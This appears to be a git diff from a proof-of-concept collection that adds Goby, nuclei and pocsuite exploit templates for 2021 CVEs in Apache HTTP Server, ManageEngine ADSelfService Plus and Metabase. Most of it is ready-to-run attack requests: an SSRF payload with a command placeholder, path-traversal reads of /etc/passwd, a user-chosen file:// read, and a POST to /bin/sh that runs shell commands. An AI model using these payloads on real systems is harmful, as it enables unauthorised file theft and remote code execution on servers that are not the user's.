+ "Value": "http://baidu.com/api/v1/targets"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "302",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$head",
+ "operation": "contains",
+ "value": "http://www.baidu.com/search/error.html",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastheader|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|{{{cmd}}}",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-04 20:40:03",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
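Review bot: The `Impact` value at L4169 contains a line break before the closing quote; the hunk header counts 98 added lines and there are exactly 98 `+` lines, so that break is a control character inside one line (presumably a bare CR) rather than a new line, and an unescaped control character inside a JSON string is rejected by strict parsers even if Goby's loader happens to accept it. The string should sit on one line with nothing after the period, `"Impact": "It allows remote attackers to access the content of internal network resources.",`; the CVE-2021-41773 record at L4467 has the same break in its `Impact`, and the very long `uri` values at L4192 and L4231 should be checked for the same character. `Homepage` at L4167 points at gobies.org rather than the httpd project site that the `Product` names.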
diff --git a/2021/CVE-2021-40438/poc/xray/CVE-2021-40438.yaml b/2021/CVE-2021-40438/poc/xray/CVE-2021-40438.yml
similarity index 100%
rename from 2021/CVE-2021-40438/poc/xray/CVE-2021-40438.yaml
rename to 2021/CVE-2021-40438/poc/xray/CVE-2021-40438.yml
diff --git a/2021/CVE-2021-40539/poc/goby/CVE-2021-40539.json b/2021/CVE-2021-40539/poc/goby/CVE-2021-40539.json
new file mode 100644
index 000000000..01d8fdfe5
--- /dev/null
+++ b/2021/CVE-2021-40539/poc/goby/CVE-2021-40539.json
@@ -0,0 +1,72 @@
+{
+ "Name": "ADSelfService Plus RCE CVE-2021-40539",
+ "Level": "3",
+ "Tags": [
+ "rce",
+ "unauth"
+ ],
+ "GobyQuery": "(title=\"ManageEngine - ADSelfService Plus\" | app=\"ZOHO-ManageEngine-ADSelfService\" | title==\"ADSelfService Plus\" | body=\"ADSelfService Plus\")",
+ "Description": "Zoho ManageEngine ADSelfService Plus 6113版本及更早版本存在授权问题漏洞,该漏洞源于软件很容易绕过REST API认证,从而导致远程代码执行",
+ "Product": "ADSelfService Plus",
+ "Homepage": "https://www.manageengine.cn/products/self-service-password/pricing-details.html",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://forum.butian.net/share/876"
+ ],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/./RestAPI/LogonCustomization",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "methodToCall=previewMobLogo",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "var d = new Date();",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "window.parent.$(\"#tabLogo\")",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-30 20:01:22",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-41277/poc/goby/CVE-2021-41277.json b/2021/CVE-2021-41277/poc/goby/CVE-2021-41277.json
new file mode 100644
index 000000000..6ee016bf5
--- /dev/null
+++ b/2021/CVE-2021-41277/poc/goby/CVE-2021-41277.json
@@ -0,0 +1,98 @@
+{
+ "Name": "Metabase Geojson Arbitrary File Read CVE-2021-41277",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "(app=\"Metabase\" | title=\"Metabase\" | body=\"Metabase\")",
+ "Description": "Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.",
+ "Product": "Metabase",
+ "Homepage": "https://www.metabase.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486238&idx=1&sn=0eea83880942b16975335739e1db5aa2"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "Path",
+ "Type": "input",
+ "Value": "/etc/passwd"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/api/geojson?url=file:/etc/passwd",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "/root:/bin/ash",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/api/geojson?url=file:{{{Path}}}",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-21 15:03:56",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/goby/CVE-2021-41773.json b/2021/CVE-2021-41773/poc/goby/CVE-2021-41773.json
new file mode 100644
index 000000000..04747eefb
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/goby/CVE-2021-41773.json
@@ -0,0 +1,105 @@
+{
+ "Name": "Apache HTTP Server Arbitrary File Read(CVE-2021-41773)",
+ "Level": "2",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "(server=\"Apache/2.4.49\"||product=\"Apache-Web-Server\"||server=\"Apache\")",
+ "Description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.",
+ "Product": "Apache HTTP Server",
+ "Homepage": "http://httpd.apache.org/",
+ "Author": "aetkrad",
+ "Impact": "read arbitrary files
",
+ "Recommendation": "",
+ "References": [
+ "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "Filepath",
+ "Type": "input",
+ "Value": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root:x:0:0:root:",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root:x:0:0:root:",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-10-28 10:10:27",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/nuclei/CVE-2021-41773.yaml b/2021/CVE-2021-41773/poc/nuclei/CVE-2021-41773.yaml
new file mode 100644
index 000000000..4b8ac8ef2
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/nuclei/CVE-2021-41773.yaml
@@ -0,0 +1,47 @@
+id: CVE-2021-41773
+
+info:
+ name: Apache 2.4.49 - Path Traversal and Remote Code Execution
+ author: daffainfo
+ severity: high
+ description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
+ reference:
+ - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
+ - https://twitter.com/ptswarm/status/1445376079548624899
+ - https://twitter.com/h4x0r_dz/status/1445401960371429381
+ - https://github.com/blasty/CVE-2021-41773
+ tags: cve,cve2021,lfi,rce,apache,misconfig
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-41773
+ cwe-id: CWE-22
+ metadata:
+ shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49
+
+requests:
+ - raw:
+ - |
+ GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
+
+ matchers-condition: or
+ matchers:
+
+ - type: regex
+ name: LFI
+ regex:
+ - "root:.*:0:0"
+
+ - type: word
+ name: RCE
+ words:
+ - "CVE-2021-41773-POC"
diff --git a/2021/CVE-2021-41773/poc/oneliner/wait_to_be_added b/2021/CVE-2021-41773/poc/oneliner/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/oneliner/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-41773/poc/others/README.md b/2021/CVE-2021-41773/poc/others/README.md
new file mode 100644
index 000000000..90e742d7b
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/others/README.md
@@ -0,0 +1,2 @@
+[https://github.com/numanturle/CVE-2021-41773](https://github.com/numanturle/CVE-2021-41773)
+[https://www.exploit-db.com/exploits/50383](https://www.exploit-db.com/exploits/50383)
\ No newline at end of file
diff --git a/2021/CVE-2021-41773/poc/pocsuite2/CVE-2021-41773.py b/2021/CVE-2021-41773/poc/pocsuite2/CVE-2021-41773.py
new file mode 100644
index 000000000..4f0508eb5
--- /dev/null
+++ b/2021/CVE-2021-41773/poc/pocsuite2/CVE-2021-41773.py
@@ -0,0 +1,63 @@
+# coding: utf-8
+from pocsuite.lib.core.poc import Output
+from pocsuite.poc import POCBase
+from pocsuite.utils import register
+import urllib2
+import re
+
+class TestPOC(POCBase):
+
+ vulID = '''pcmgr-328131'''
+ version = '1'
